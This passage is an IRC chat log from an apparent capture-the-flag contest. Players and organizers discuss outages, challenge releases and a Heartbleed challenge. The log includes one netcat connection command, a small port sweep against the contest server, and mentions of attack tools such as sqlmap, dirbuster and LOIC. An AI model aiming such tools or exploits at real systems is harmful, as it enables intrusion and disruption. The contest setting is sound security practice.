  469. (00:20:27) (+tylerni7) but I'm just saying I don't want to check it again
  470. (00:20:35) (+houqp) kevin``: it's up
  471. (00:20:37) (+tylerni7) because... the answer will almost certainly be yes
  472. (00:20:38) (+tylerni7) :P
  473. (00:20:39) (+tylerni7) thanks houqp
  474. (00:20:46) (kevin``) ok, no worries. my local tor is probably fucked then, or i'm missing something
  475. (00:20:48) (kevin``) thanks
  476. (00:21:05) (imnottyler) the cookie is tyler!!
  477. (00:21:08) (+houqp) kevin``: standard client will not work for this problem
  478. (00:21:09) (imnottyler) RTFM
  479. (00:21:23) (+houqp) the cookie is tylerni7
  480. (00:21:28) (tylerma7) why is the chrono thing is stuck again? i don't get that part of the game
  481. (00:21:47) (+mserrano) tylerma7: an unsolved problem needs to be solved
  482. (00:21:50) (+mserrano) for it to unstuck
  483. (00:21:56) (tylerma7) kk
  484. (00:22:06) (imnottyler) we resolv the tyler stegano challenge
  485. (00:22:07) ••• jOin: (l0ve) (72560111@gateway/web/freenode/ip.114.86.1.17)
  486. (00:22:10) ••• jOin: (duper) ([email protected])
  487. (00:22:24) ••• jOin: (wa7ang) ([email protected])
  488. (00:22:49) (TYLERVII) stupid challenge release
  489. (00:23:08) (+tylerni7) in an hour or two we'll probably open up something new... tiffany and rsa are both pretty hard
  490. (00:23:22) (imnottyler) wow
  491. (00:23:28) ••• jOin: (motherapplenator) ([email protected])
  492. (00:23:30) (imnottyler) its a long time!
  493. (00:23:50) (TYLERVII) wtf
  494. (00:24:01) (TYLERVII) drop it likes its hot
  495. (00:26:15) (+tylerni7) tomcr00se: how's it going?
  496. (00:26:31) (tomcr00se) she's done
  497. (00:26:39) (tomcr00se) in the kitchen now at the sink
  498. (00:26:43) ••• jOin: (cyber) ([email protected])
  499. (00:26:54) (+tylerni7) -_-
  500. (00:27:04) ••• nIck: (cyber) is now known as (cybercybercyber)
  501. (00:27:04) (imnottyler) really bad tylerni7
  502. (00:27:13) (+cai_) tomcr00se: lol
  503. (00:27:19) (n00b13) does firebug help fore web150?
  504. (00:27:25) ••• qUit: (eatkinson) ([email protected]) Quit: WeeChat 0.4.3
  505. (00:27:27) (poppopret) lol
  506. (00:27:28) (imnottyler) even tomcr00se didnt answer any challenge
  507. (00:27:35) (+cai_) GaCTF: lol you are bad at CTF'ing
  508. (00:27:38) (+tylerni7) imnottyler: he did at least one
  509. (00:27:44) ••• qUit: (wa7ang) ([email protected]) Remote host closed the connection
  510. (00:27:48) ••• qUit: (motherapplenator) ([email protected]) Ping timeout: 258 seconds
  511. (00:27:51) (imnottyler) they just find the poop one!
  512. (00:28:00) (+cai_) submitting all characters on your keyboard wouldn't get you points :p
  513. (00:28:20) (+cai_) and you made a typo
  514. (00:28:25) (+cai_) that was supposed to be 6
  515. (00:28:28) (+cai_) not .
  516. (00:28:38) ••• jOin: (veorq) ([email protected])
  517. (00:28:40) (asmoday) I got stuck at mtpox admin then blood started shooting out of my ears
  518. (00:28:55) ••• jOin: (p4574) ([email protected])
  519. (00:29:01) (asmoday) turns out they stripped tiffany before breakfast
  520. (00:29:08) (+mserrano) wut
  521. (00:29:09) ••• qUit: (lfogel) ([email protected]) Remote host closed the connection
  522. (00:29:15) (asmoday) and not bitrot is going to make me a janitor
  523. (00:29:19) (asmoday) *now
  524. (00:30:16) (TYLERVII) C'mon man
  525. (00:30:38) (TYLERVII) we want new challenges
  526. (00:30:47) (imnottyler) this is the wooooooooooooorst CTF ever!!!!!!
  527. (00:30:51) (imnottyler) from all the time!
  528. (00:30:51) (+mserrano) imnottyler: :(
  529. (00:30:54) (+mserrano) why do you say that
  530. (00:31:25) ••• nIck: (imnottyler) is now known as (ImtheMuscleTyler)
  531. (00:31:47) ••• nIck: (Tylernl7) is now known as (BenchMeTyler)
  532. (00:31:53) (+tylerni7) o.0
  533. (00:32:05) ••• qUit: (irctc141) (48d7df83@gateway/web/freenode/ip.72.215.223.131) Ping timeout: 240 seconds
  534. (00:32:21) ••• jOin: (sibios) (~sibios@unaffiliated/sibios)
  535. (00:32:33) ••• qUit: (RPISEC) (807163f2@gateway/web/cgi-irc/kiwiirc.com/ip.128.113.99.242) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  536. (00:33:16) ••• nIck: (TYLERVII) is now known as (dropnewchallenge)
  537. (00:33:31) (dwn) admins pls fix email disclosure in whatscat
  538. (00:33:33) (RentjongTinTin) is there any other clue on mtpox? we should guess $SECRET and $auth to match with hsh?
  539. (00:33:33) (dwn) unfriendly cats
  540. (00:33:34) (virodoran) asmoday: I've got blood shooting out of my ears too
  541. (00:33:43) ••• nIck: (dropnewchallenge) is now known as (newchallengessss)
  542. (00:33:45) ••• jOin: (HeadHunter) ([email protected])
  543. (00:33:52) (virodoran) typical Friday night
  544. (00:34:05) ••• qUit: (l0ve) (72560111@gateway/web/freenode/ip.114.86.1.17) Ping timeout: 240 seconds
  545. (00:34:06) ••• jOin: (Yen1) ([email protected])
  546. (00:34:27) ••• qUit: (Hertz_) ([email protected]) Ping timeout: 252 seconds
  547. (00:34:54) ••• jOin: (DaramG) (8ff8eb18@gateway/web/cgi-irc/kiwiirc.com/ip.143.248.235.24)
  548. (00:34:57) ••• qUit: (RentjongTinTin) ([email protected]) Quit: Leaving...
  549. (00:35:04) (ImtheMuscleTyler) dirbuster time!!!
  550. (00:35:04) (Yen1) can I ask a question about web 300?
  551. (00:35:17) (ImtheMuscleTyler) no question is acceptable!
  552. (00:35:21) (Yen1) darn
  553. (00:35:29) (ImtheMuscleTyler) you will be ban Yen1
  554. (00:35:42) • Yen1 hangs head in banned shame
  555. (00:35:50) (+tylerni7) ImtheMuscleTyler: :|
  556. (00:35:51) (ImtheMuscleTyler) kickout!
  557. (00:35:57) (+tylerni7) Yen1: feel free to pm me any questions
  558. (00:36:02) (+tylerni7) please no dirbuster
  559. (00:36:02) (ImtheMuscleTyler) me
  560. (00:36:03) (ImtheMuscleTyler) too
  561. (00:36:06) (+tylerni7) dirbuster makes servers sad
  562. (00:36:18) (ImtheMuscleTyler) ask me your question
  563. (00:36:23) (virodoran) LOIC makes them happy
  564. (00:36:27) (ImtheMuscleTyler) im availlable for any help
  565. (00:36:28) (virodoran) keeps them entertained
  566. (00:36:40) (+clockish_or_tylr) virodoran: pls no
  567. (00:37:03) ••• jOin: (Yerer) ([email protected])
  568. (00:37:04) (asmoday) screw it i will wait for the write ups
  569. (00:37:10) (asmoday) Bsides was better
  570. (00:37:14) (BenchMeTyler) asmoday +1 point
  571. (00:37:28) (ImtheMuscleTyler) Yen1 ask me, im the master chief of this CTF
  572. (00:37:35) (+clockish_or_tylr) asmoday: hack harder
  573. (00:37:36) (ImtheMuscleTyler) i will answer nything you want!
  574. (00:37:49) (dwn) 00:33 <+mserrano> and then you move that many spaces forwards
  575. (00:37:51) (dwn) uh
  576. (00:37:54) (dwn) how do we know where we are
  577. (00:38:04) (asmoday) I am on my own ha I killed my connection running sqlmap, nikto, and trying to do this python rsa script
  578. (00:38:05) (+clockish_or_tylr) asmoday: or come back later when more problems are open, there are a lot more different ones still hiding
  579. (00:38:05) (dwn) like i figured that
  580. (00:38:19) (+mserrano) dwn: you are at the latest problem opened
  581. (00:38:22) (+mserrano) so, rsa right now
  582. (00:38:23) (virodoran) dwn: the yellow one with the lines in it
  583. (00:38:27) (dwn) oh ok
  584. (00:38:29) ••• nIck: (newchallengessss) is now known as (Tylerni007)
  585. (00:38:30) (+mserrano) and those lines across it are the indicator
  586. (00:38:32) (Yerer) So for rendezvous, is the fact that I'm unable to connect to the site on TOR part of the problem itself or just a personal problem/server problem?
  587. (00:38:38) (dwn) does it loop back around
  588. (00:38:40) (virodoran) dwn: see: http://play.plaidctf.com/rules
  589. (00:38:40) (dwn) or are they lost forever
  590. (00:38:47) (dwn) who reads rules...
  591. (00:39:10) (+mserrano) dwn: it loops
  592. (00:39:17) (+mserrano) dwn: but first it goes through the time portal
  593. (00:39:20) (virodoran) people who want to procastinate working on the ctf problems
  594. (00:39:36) (ImtheMuscleTyler) Do you know 1 Hacker that read rules?
  595. (00:39:46) (+tylerni7) Yerer: read it more carefully
  596. (00:39:51) (+tylerni7) it is running and has been solved
  597. (00:40:05) ••• qUit: (merrin_) ([email protected]) Remote host closed the connection
  598. (00:40:07) (dwn) can confirm, was easy
  599. (00:40:13) (dwn) too easy please make ctf harder
  600. (00:40:15) ••• nIck: (clockish_or_tylr) is now known as (clockish)
  601. (00:40:28) (dwn) more stegano
  602. (00:40:32) (+cai_) oh yeah, when it loops, already opened tiles are not going to be counted for the rolls
  603. (00:40:35) (Yerer) Okay thanks just didn't want to think and then realize server is just down or something
  604. (00:40:37) (Tylerni007) sorry guys for the inconveniences
  605. (00:40:43) (_eko) clockish: you're in charge for the pyjail ?
  606. (00:40:49) (dwn) i am
  607. (00:40:54) (+clockish) _eko: yes
  608. (00:41:26) (Tylerni007) come see me if you have any troubles
  609. (00:41:35) ••• qUit: (tedmeyer) ([email protected]) Ping timeout: 252 seconds
  610. (00:41:59) ••• qUit: (gut) ([email protected]) Ping timeout: 258 seconds
  611. (00:42:05) ••• qUit: (loca) (79a88098@gateway/web/freenode/ip.121.168.128.152) Ping timeout: 240 seconds
  612. (00:42:44) ••• qUit: (Andrew) ([email protected]) Quit: Leaving
  613. (00:43:16) (Tylerni007) we are currently fixing the 502 bad gateway
  614. (00:43:26) (Tylerni007) sorry for the mess guys
  615. (00:43:57) (+tylerni7) lol
  616. (00:44:13) (+clockish) Tylerni007: DO A BETTER JOB OF IT
  617. (00:44:14) (+clockish) JESUS
  618. (00:44:19) ••• jOin: (gut) ([email protected])
  619. (00:44:24) (justinsteven) hmm. whatscat is having issues?
  620. (00:44:33) (inter) i think you should +v Tylerni007
  621. (00:44:40) (dwn) nah whatscat is working well
  622. (00:44:48) (justinsteven) including email?
  623. (00:44:54) (justinsteven) :)
  624. (00:44:55) (+tylerni7) justinsteven: what issue?
  625. (00:44:57) (+tylerni7) is it down?
  626. (00:45:00) (justinsteven) not sending email
  627. (00:45:01) (justinsteven) it seems
  628. (00:45:04) (+tylerni7) seems up to me... hmm
  629. (00:45:19) (+tylerni7) could be your mail provider is sad if too many things are sent
  630. (00:45:22) (+tylerni7) did you check spam, etc?
  631. (00:45:24) (justinsteven) that or it's being filtered by anti-spam at two places
  632. (00:45:29) (justinsteven) gmail and somewhere else
  633. (00:45:44) (+tylerni7) maybe
  634. (00:45:50) (dwn) what provider is it not blocked on
  635. (00:45:51) (justinsteven) it was working for a while
  636. (00:46:16) (justinsteven) tylerni7: can I pm? I have an unrelated issue to mention :)
  637. (00:46:18) (+cai_) we'll open a new problem soon
  638. (00:46:19) (+tylerni7) I'll kick postfix
  639. (00:46:21) (+tylerni7) yeah
  640. (00:46:23) (+tylerni7) feel free to pm
  641. (00:46:26) ••• qUit: (cybercybercyber) ([email protected]) Quit: cybercybercyber
  642. (00:46:53) (dwn) did you guys not forsee problems with a chall relying on email being sent
  643. (00:47:07) (+tylerni7) dwn: it doesn't rely on it
  644. (00:47:08) (+cai_) NEW PROBLEM IS OPENED
  645. (00:47:22) (+tylerni7) it's just nice to have
  646. (00:47:56) (+cai_) heartbleeeeed
  647. (00:48:00) (+cai_) let's see how long it takes
  648. (00:48:03) (+cai_) it's a race
  649. (00:48:17) (ryan-c) cai_: for which?
  650. (00:48:19) (+tylerni7) heh
  651. (00:48:21) (+tylerni7) the new problem!
  652. (00:48:22) (+tylerni7) go go go
  653. (00:48:34) (+cai_) ryan-c: new problem is up
  654. (00:48:39) (ryan-c) ah
  655. (00:48:46) (ryan-c) i'm busy with rsa
  656. (00:48:50) (+tylerni7) :)
  657. (00:48:50) (+mserrano) :)
  658. (00:48:53) (+tylerni7) that may take you a while
  659. (00:48:55) (ryan-c) it is bleeding bits
  660. (00:49:06) (+mserrano) heartbleed bleeds flages!
  661. (00:49:48) (ryan-c) tylerma7: will be interested to hear later what solution you guys tested with
  662. (00:50:08) (ryan-c) i suspect there's only one reasonable way to do it
  663. (00:50:13) (cychao) are misc250 alive?
  664. (00:50:33) (tylerma7) sure
  665. (00:50:47) (tylerma7) but you first
  666. (00:50:58) (ImtheMuscleTyler) im the real Tyler!!
  667. (00:51:07) (ImtheMuscleTyler) im the muscle one!
  668. (00:51:22) (+cai_) heartbleed is down
  669. (00:51:23) (+cai_) will be up soon
  670. (00:51:38) (+houqp) cychao: yes
  671. (00:51:59) (ImtheMuscleTyler) booooh!!!1
  672. (00:52:25) (tylerma7) whats up with the server guys?
  673. (00:52:32) (ImtheMuscleTyler) WE need this misc10 to win this CTF!!!
  674. (00:52:42) (ImtheMuscleTyler) give them up!!1
  675. (00:53:11) (+cai_) it'll be back soon, sorry
  676. (00:53:30) (mrsmith67) heartbleed down?
  677. (00:53:32) (+cai_) yep
  678. (00:53:46) ••• pArt: (blerbl) ([email protected])
  679. (00:55:11) ••• jOin: (abc) (7506549f@gateway/web/freenode/ip.117.6.84.159)
  680. (00:55:19) ••• qUit: (abcert) ([email protected]) Ping timeout: 252 seconds
  681. (00:55:57) ••• qUit: ([CISSP]HoLyVieR) ([email protected]) Read error: Connection reset by peer
  682. (00:56:49) (ImtheMuscleTyler) if you wanna have any question ask Tyler007
  683. (00:57:01) (ImtheMuscleTyler) here is the best!
  684. (00:57:07) (+tylerni7) tomcr00se: nice
  685. (00:57:09) (tomcr00se) woot
  686. (00:57:15) (+cai_) tomcr00se: nice
  687. (00:57:19) • +tylerni7 goes to bed
  688. (00:57:20) (+tylerni7) later guys
  689. (00:57:21) ••• jOin: (merrin) ([email protected])
  690. (00:57:32) (inter) tylerni7 nooooo
  691. (00:57:33) (inter) dont die
  692. (00:57:36) (+cai_) chronosphere is charged
  693. (00:57:39) (inter) stay alive
  694. (00:57:39) (ImtheMuscleTyler) inter
  695. (00:57:40) (+cai_) vote vote vote
  696. (00:57:41) (tylerma7) tyler, my friend
  697. (00:57:44) (ImtheMuscleTyler) im the Tyler..
  698. (00:57:57) (inter) tylerma LOL
  699. (00:57:59) (inter) god
  700. (00:58:09) ••• qUit: (juan_) (~jescobar@unaffiliated/jescobar) Quit: Leaving
  701. (00:58:18) (Tylerni007) stop trying to steal my id
  702. (00:58:31) ••• jOin: (shortkidd) (60279873@gateway/web/freenode/ip.96.39.152.115)
  703. (00:59:02) ••• jOin: (pctf527) (46b9d762@gateway/web/freenode/ip.70.185.215.98)
  704. (00:59:22) (+cai_) reekee is opened
  705. (00:59:25) (+cai_) heartbleed is checked
  706. (00:59:28) (+cai_) sovled*
  707. (00:59:30) (+cai_) solved*
  708. (00:59:48) (virodoran) how is it solved if the server is down? :o
  709. (00:59:53) (+mserrano) it's not
  710. (00:59:54) (+mserrano) it's up
  711. (01:00:14) (+cai_) also, the timer halves when a team second/third blood the problem
  712. (01:00:51) ••• qUit: (mekanismen) (mekanismen@unaffiliated/mekanismen) Ping timeout: 252 seconds
  713. (01:00:59) (virodoran) oh, different ports now, I see
  714. (01:01:12) (virodoran) I was wondering why it was refusing connection, lol
  715. (01:01:15) (mrsmith67) how can heartbleed be solved if its down?
  716. (01:01:30) (ImtheMuscleTyler) lol
  717. (01:01:39) (ImtheMuscleTyler) the whole site is down
  718. (01:01:45) (ImtheMuscleTyler) for more than hours...
  719. (01:02:23) (spq) i cant connect to 54.198.183.100 10000 or any port above
  720. (01:02:24) (tomcr00se) where is reekee?
  721. (01:02:34) (+mserrano) tomcr00se: click on the ball in the middle of the numbers
  722. (01:02:37) (+mserrano) to switch to the other board
  723. (01:02:38) ••• jOin: (AnthraX101) ([email protected])
  724. (01:02:38) (Nanomebia) heartbleed still broken?
  725. (01:02:40) (+mserrano) where reekee lives
  726. (01:02:47) (+cai_) heartbleed works
  727. (01:03:00) (inter) how doyou spell tom crus
  728. (01:03:03) (inter) cruz?
  729. (01:03:04) (n00b13) lol
  730. (01:03:07) (inter) like the cool mexican name?
  731. (01:03:08) ••• jOin: (oldtopman) ([email protected])
  732. (01:03:09) (inter) tom cruz
  733. (01:03:16) ••• qUit: (oldtopman) ([email protected]) Changing host
  734. (01:03:17) ••• jOin: (oldtopman) (~oldtopman@unaffiliated/oldtopman)
  735. (01:03:24) (inter) shit
  736. (01:03:26) (inter) thats actually
  737. (01:03:26) ••• jOin: (Andrew) ([email protected])
  738. (01:03:27) (+cai_) heartbleed's description changed. check if you haven't
  739. (01:03:27) (inter) a sick name
  740. (01:03:30) (inter) tom cruz
  741. (01:04:05) (+cai_) 40 votes so far
  742. (01:04:28) ••• qUit: (n00b13) (~n00b13@unaffiliated/nitsua)
  743. (01:04:41) ••• jOin: (merrin_) ([email protected])
  744. (01:04:55) ••• qUit: (merrin) ([email protected]) Read error: Connection reset by peer
  745. (01:04:55) (spq) cai_: so we should be able to see something via https://54.198.183.100:10000/ =?
  746. (01:04:57) (spq) -=
  747. (01:04:58) (RedRover) anyone else working on reverse 200?
  748. (01:05:04) (zardus) CAT DOWN CAT DOWN
  749. (01:05:10) (zardus) (right?)
  750. (01:05:11) (RedRover) i feel like it's being neglected
  751. (01:05:28) (+cai_) spq: look at the title :p
  752. (01:05:31) (+cai_) should be trivial
  753. (01:05:34) ••• jOin: (frompy) ([email protected])
  754. (01:06:01) ••• qUit: (merrin_) ([email protected]) Read error: Connection reset by peer
  755. (01:06:08) ••• jOin: (merrin) ([email protected])
  756. (01:06:11) (spq) cai_: well, i nc -vvv 54.198.183.100 10914
  757. (01:06:12) (spq) nc: connect to 54.198.183.100 port 10914 (tcp) failed: Connection refused
  758. (01:06:19) (+cai_) try other ports
  759. (01:06:32) (tylerma7) vote for 6, gamble that shit
  760. (01:07:07) (zardus) tylerni7: mserrano: cai_: whatscat down?
  761. (01:07:26) (spq) cai_: tried other ports - have a heartbleed exploit and it does not work against your machine, is it correct openssl or just fake heartbleed?
  762. (01:07:49) (rray) whatscat down?
  763. (01:07:57) ••• qUit: (Frisk0) ([email protected]) Read error: Connection reset by peer
  764. (01:08:10) (+cai_) spq: it works (and it's real openssl)
  765. (01:08:24) (+mserrano) zardus: rray: will check
  766. (01:08:37) (warrick) mserrano: down for me too
  767. (01:08:45) ••• jOin: (abcert) ([email protected])
  768. (01:08:57) (Nanomebia) cai_: i'm also unable to connect to anything 10000 through 11000
  769. (01:09:58) (+cai_) Nanomebia: i just tested and it still works
  770. (01:10:03) (+cai_) just try more ports in that range
  771. (01:10:10) (Nanomebia) weird
  772. (01:10:19) (+cai_) the voting is ending soon
  773. (01:10:24) (+cai_) so far 70 votes :)
  774. (01:10:54) (virodoran) yeah, I'm able to connect to random ports for a few seconds before they refuse connections
  775. (01:10:59) (virodoran) then eventually they come back up again
  776. (01:11:14) (+cai_) virodoran: gotta do useful stuff when you get the connection :)
  777. (01:11:23) ••• qUit: (merrin) ([email protected]) Ping timeout: 240 seconds
  778. (01:11:25) (+cai_) chance card.. but no luck
  779. (01:12:13) (+mserrano) warrick: rray zardus: restarted all teh stuff I could find
  780. (01:12:24) (+mserrano) warrick: rray zardus: anything more will need to wait for Tylerni007
  781. (01:12:25) (+mserrano) er
  782. (01:12:28) (+mserrano) tylerni7*
  783. (01:12:33) (warrick) mserrano: much obliged
  784. (01:12:40) (rray) mserrano: works now
  785. (01:12:43) (+mserrano) thanks
  786. (01:12:45) (+mserrano) cool
  787. (01:12:47) ••• qUit: (KT) ([email protected]) Ping timeout: 240 seconds
  788. (01:12:55) • +mserrano knows like nothing about that problem
  789. (01:13:04) (rray) ...down again
  790. (01:13:07) (inter) mserrano where is my cookie
  791. (01:13:19) (+mserrano) rray: looks up from here
  792. (01:13:26) (warrick) down for me too
  793. (01:13:29) ••• pArt: (garganoth) ([email protected])
  794. (01:13:33) (+cai_) you guys have 2 minutes to roll
  795. (01:13:38) (zardus) mserrano: appears that it's down again
  796. (01:13:48) (+mserrano) are you looking at ipv4 or ipv6
  797. (01:13:51) (+cai_) (you can't land on chance card twice, btw)
  798. (01:13:52) (+mserrano) I can talk to it fine on ipv4
  799. (01:13:55) (zardus) mserrano: the frontend is up, the backend seems screwed
  800. (01:13:58) (+mserrano) oh
  801. (01:13:59) (+mserrano) bleh
  802. (01:14:00) ••• jOin: (CaIlou) ([email protected])
  803. (01:14:09) (+mserrano) I think it is currently resetting?
  804. (01:14:09) (+mserrano) idk
  805. (01:14:10) ••• jOin: (merrin) ([email protected])
  806. (01:14:48) (tylerma7) vote 5
  807. (01:14:55) (warrick) did you try turning it off and on again? :}
  808. (01:14:58) ••• jOin: (F___) (5f1dfc82@gateway/web/freenode/ip.95.29.252.130)
  809. (01:15:05) (rray) the server pings, the php script is taking too long
  810. (01:15:12) (+mserrano) hm
  811. (01:15:15) ••• jOin: (XPenguin) ([email protected])
  812. (01:15:17) (+mserrano) the users table appears fucked
  813. (01:15:21) (rray) nice
  814. (01:15:22) ••• qUit: (Andrew) ([email protected])
  815. (01:15:32) (+cai_) reversing 250 is opened
  816. (01:15:38) (Anyny0) 404
  817. (01:15:46) ••• jOin: (hbw) ([email protected])
  818. (01:16:02) (inter) what if i had epilepsy
  819. (01:16:03) ••• qUit: (F___) (5f1dfc82@gateway/web/freenode/ip.95.29.252.130) Client Quit
  820. (01:16:06) (zardus) mserrano: is that something that needs to wait for tylerni7?
  821. (01:16:11) (inter) and reekee gave me shocks
  822. (01:16:12) (XPenguin) guys, if I understood correctly, I can post the flag only for current task? I'm late due to timezone =)
  823. (01:16:16) ••• jOin: (reanimus) ([email protected])
  824. (01:16:21) ••• pArt: (CaIlou) ([email protected])
  825. (01:16:22) (Anyny0) There is a warning for epilepsy inter
  826. (01:16:25) (+cai_) the file is not there
  827. (01:16:27) (inter) i could potentially recieve brain damage :/
  828. (01:16:28) (+cai_) we will upload
  829. (01:16:42) (zardus) XPenguin: yeah, it's a bummer :-(
  830. (01:16:42) (+cai_) XPenguin: no, you can submit any flags you found
  831. (01:16:44) (+cai_) at any given time
  832. (01:16:47) (zardus) :-)
  833. (01:16:47) (+frozencemetery) we posted an epilepsy warning, inter
  834. (01:16:54) ••• jOin: (CaIlou) ([email protected])
  835. (01:16:58) (XPenguin) cai_: thanks)
  836. (01:17:25) (+cai_) the file is there now Anyny0
  837. (01:17:43) (+mserrano) zardus: I a... not sure, but I suspect yes
  838. (01:17:45) (+mserrano) am*
  839. (01:17:47) ••• qUit: (Anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109) Quit: http://www.kiwiirc.com/ - A hand crafted IRC client
  840. (01:18:12) ••• jOin: (thisnicknameisav) (7b748d38@gateway/web/freenode/ip.123.116.141.56)
  841. (01:19:05) (warrick) mserrano: ;_;
  842. (01:19:25) (+cai_) i'm going to sleep now.. see you guys later
  843. (01:19:28) (+cai_) gl
  844. (01:19:37) ••• jOin: (imo) (3d7ebfc3@gateway/web/freenode/ip.61.126.191.195)
  845. (01:19:54) ••• qUit: (rvpersie) ([email protected]) Remote host closed the connection
  846. (01:20:01) ••• nIck: (imo) is now known as (Guest95043)
  847. (01:20:18) (inter) the mods
  848. (01:20:24) (inter) are all falling into the darkness
  849. (01:20:27) (asmoday) well I was tired until that mymeme page...now its a party
  850. (01:20:59) (shortkidd) omg
  851. (01:21:05) ••• qUit: (chandler_) (dce9b865@gateway/web/freenode/ip.220.233.184.101) Ping timeout: 240 seconds
  852. (01:21:06) (shortkidd) I was wondering why heartbleed wasn't working
  853. (01:21:13) (shortkidd) I forgot to enter the -p to enable port ><
  854. (01:21:16) (asmoday) lightswitch rave...thump thump thump..thump..thump...the cheat is grounded
  855. (01:21:23) ••• qUit: (merrin) ([email protected]) Ping timeout: 240 seconds
  856. (01:22:06) (reanimus) heartbleed constantly disconnects me ;;
  857. (01:22:53) (+clockish) reanimus: try a different port
  858. (01:22:56) ••• jOin: (mekanismen) (~mek@unaffiliated/mekanismen)
  859. (01:23:46) ••• jOin: (dracu) ([email protected])
  860. (01:23:47) ••• jOin: (hellok_) ([email protected])
  861. (01:25:57) (reanimus) Sending heartbeat request...
  862. (01:25:57) (reanimus) Unexpected EOF receiving record header - server closed connection
  863. (01:25:58) (reanimus) No heartbeat response received, server likely not vulnerable
  864. (01:26:02) (reanimus) hmmmmm
  865. (01:26:18) (mrsmith67) reanimus thats what im geting to
  866. (01:26:44) (reanimus) Tried a C implementation, it also pukes on it
  867. (01:27:16) (x56) same, over many ports
  868. (01:27:36) (shortkidd) python one isn't working
  869. (01:27:54) (inter) python one is up
  870. (01:28:01) (inter) you mean pwn375
  871. (01:28:07) (shortkidd) no
  872. (01:28:10) (shortkidd) heartbleed through python
  873. (01:28:23) (sdfsfdsfd) tried it in python 2.7 and 3.3. nada
  874. (01:28:37) (Nanomebia) woo finally got heartbleed to go
  875. (01:28:46) (sdfsfdsfd) how?
  876. (01:29:00) (Nanomebia) magic :(
  877. (01:31:29) (poppopret) i see a bunch of open ports from 10000-11000 but don't know what to do with them lol
  878. (01:31:45) (reanimus) bleed it out
  879. (01:32:18) ••• qUit: (hogehoge) ([email protected]) Ping timeout: 245 seconds
  880. (01:33:10) (shortkidd) I can get a connection but can't actually do the heartbleed for some reason...
  881. (01:33:44) (RedRover) where are you guys getting the code for the heartbleed exploit?
  882. (01:33:53) ••• jOin: (hogehoge) ([email protected])
  883. (01:34:13) (reanimus) The python one is widespread
  884. (01:34:26) (reanimus) I tried one someone sent in to Full Disclosure
  885. (01:34:35) ••• jOin: (epochtato) (~epochfail@ec2-54-252-29-104.ap-southeast-2.compute.amazonaws.com)
  886. (01:34:38) (reanimus) neither is having much luck
  887. (01:34:38) ••• qUit: (nonroot) ([email protected]) Ping timeout: 276 seconds
  888. (01:34:48) ••• qUit: (Yerer) ([email protected]) Ping timeout: 245 seconds
  889. (01:35:07) (asmoday) not sure what to do with the heartbleed data....is it supposed to say flag?
  890. (01:35:14) ••• jOin: (MavJS) (~maverick@fedora/MavJS)
  891. (01:35:17) ••• qUit: (BenchMeTyler) ([email protected]) Ping timeout: 276 seconds
  892. (01:36:03) (pipecork) reanimus: same
  893. (01:36:11) (Tylerni007) chronosphere is recharging.
  894. (01:36:27) (epochtato) why can't we register with a purely numeric username ;_;
  895. (01:37:32) (sibios) blegh, stupid disconnects :(
  896. (01:39:31) (+cai_) i'm surprised that only 5 teams have solved heartbleed
  897. (01:39:47) (asmoday) not sure what to do with the data
  898. (01:39:52) (reanimus) it always terminates after sending the heartbeat for me ;;
  899. (01:40:06) (shortkidd) same her
  900. (01:40:09) (shortkidd) here*
  901. (01:40:24) (+cai_) try better exploit!
  902. (01:40:29) (reanimus) ;;;;;
  903. (01:40:57) (+cai_) (like mine works consistently)
  904. (01:41:14) ••• jOin: (LouTerrailloune) ([email protected])
  905. (01:42:28) (Nanomebia) cai_: sexybackground() i beg to disagree ;_;
  906. (01:43:49) (shortkidd) areyou using the metasploit one, cai?
  907. (01:43:54) (+cai_) nah
  908. (01:44:29) (+cai_) it's a custom one, but shouldn't be too different from others?
  909. (01:44:47) (k00mi) that python thingy gives me a dump
  910. (01:45:48) ••• jOin: (RPISEC) (807163f2@gateway/web/cgi-irc/kiwiirc.com/ip.128.113.99.242)
  911. (01:47:12) ••• jOin: (Anyny0) (6babd56d@gateway/web/cgi-irc/kiwiirc.com/ip.107.171.213.109)
  912. (01:49:00) (Tylerni007) heartbeat down
  913. (01:49:02) (Tylerni007) down
  914. (01:49:03) (Tylerni007) down
  915. (01:49:15) ••• qUit: (frompy) ([email protected]) Ping timeout: 252 seconds
  916. (01:50:18) (Anyny0) x) Sweet
  917. (01:50:34) (inter) heartbleed is down
  918. (01:50:35) (inter) all ports
  919. (01:51:07) (+cai_) lies
  920. (01:51:13) (k00mi) that's a lie
  921. (01:51:40) (inter) i was pissed off so i wrote a bruteforce to try from 10000 - 10100
  922. (01:51:43) (inter) and they all dont work
  923. (01:51:51) (inter) i didnt want to put too much load on the server so i only tried 100
  924. (01:52:02) (x56) I just tried 10070
  925. (01:52:04) (x56) it wirks
  926. (01:52:08) (x56) *works
  927. (01:52:09) (inter) wtf
  928. (01:52:11) (inter) ill try
  929. (01:52:18) (inter) lies
  930. (01:52:29) (x56) ...
  931. (01:52:33) (x56) it's sporadic
  932. (01:52:36) (x56) keep trying
  933. (01:52:41) (+clockish) e.g. 10150 works for me
  934. (01:52:47) (+frozencemetery) if the heartbleed port you get doesn't work, try a diff one
  935. (01:52:54) (+cai_) i tried 10330 and it worked
  936. (01:53:09) (+clockish) the problem is that people can do and things and take it down semi-pemanently
  937. (01:53:18) (+clockish) oh and also it's not a forking or threaded server
  938. (01:53:29) (sibios) with the C exploit? or the python exploit(s)?
  939. (01:53:31) (+clockish) i... fail at making problems.
  940. (01:53:43) (+clockish) cai_: what happens when the scoreboard wraps?
  941. (01:53:53) (+cai_) hmm?
  942. (01:53:57) (+cai_) the gameboard?
  943. (01:54:01) (+clockish) like, it's not possible to land on an already opened problem right?
  944. (01:54:07) (inter) clockish: is heartbleed yours too
  945. (01:54:08) (+cai_) right
  946. (01:54:13) (+clockish) yeah cool
  947. (01:54:23) (inter) your pyjail HOMIE
  948. (01:54:23) (+clockish) I assumed you'd got it right, just wanted to check ;)
  949. (01:54:33) (+clockish) inter: yeah, those be mine
  950. (01:54:42) (inter) my teammate wants to kill everyone around him
  951. (01:54:48) (inter) from frustration rofl
  952. (01:54:58) (Tylerni007) tylerthecreatorisgone
  953. (01:55:00) ••• qUit: (Tylerni007) ([email protected]) Quit: Quitte
  954. (01:55:03) (asmoday) heartbleed connection refused
  955. (01:55:12) (+clockish) asmoday: try a different port.
  956. (01:55:24) (asmoday) 10000-11111
  957. (01:55:27) (+clockish) it is expected that some will not always work
  958. (01:56:07) (dwn) host isn't responding on any for me rip
  959. (01:56:21) (dwn) oh rofl i wonder if this uni is filtering the exploit traffic
  960. (01:57:15) ••• jOin: (lanjelot) ([email protected])
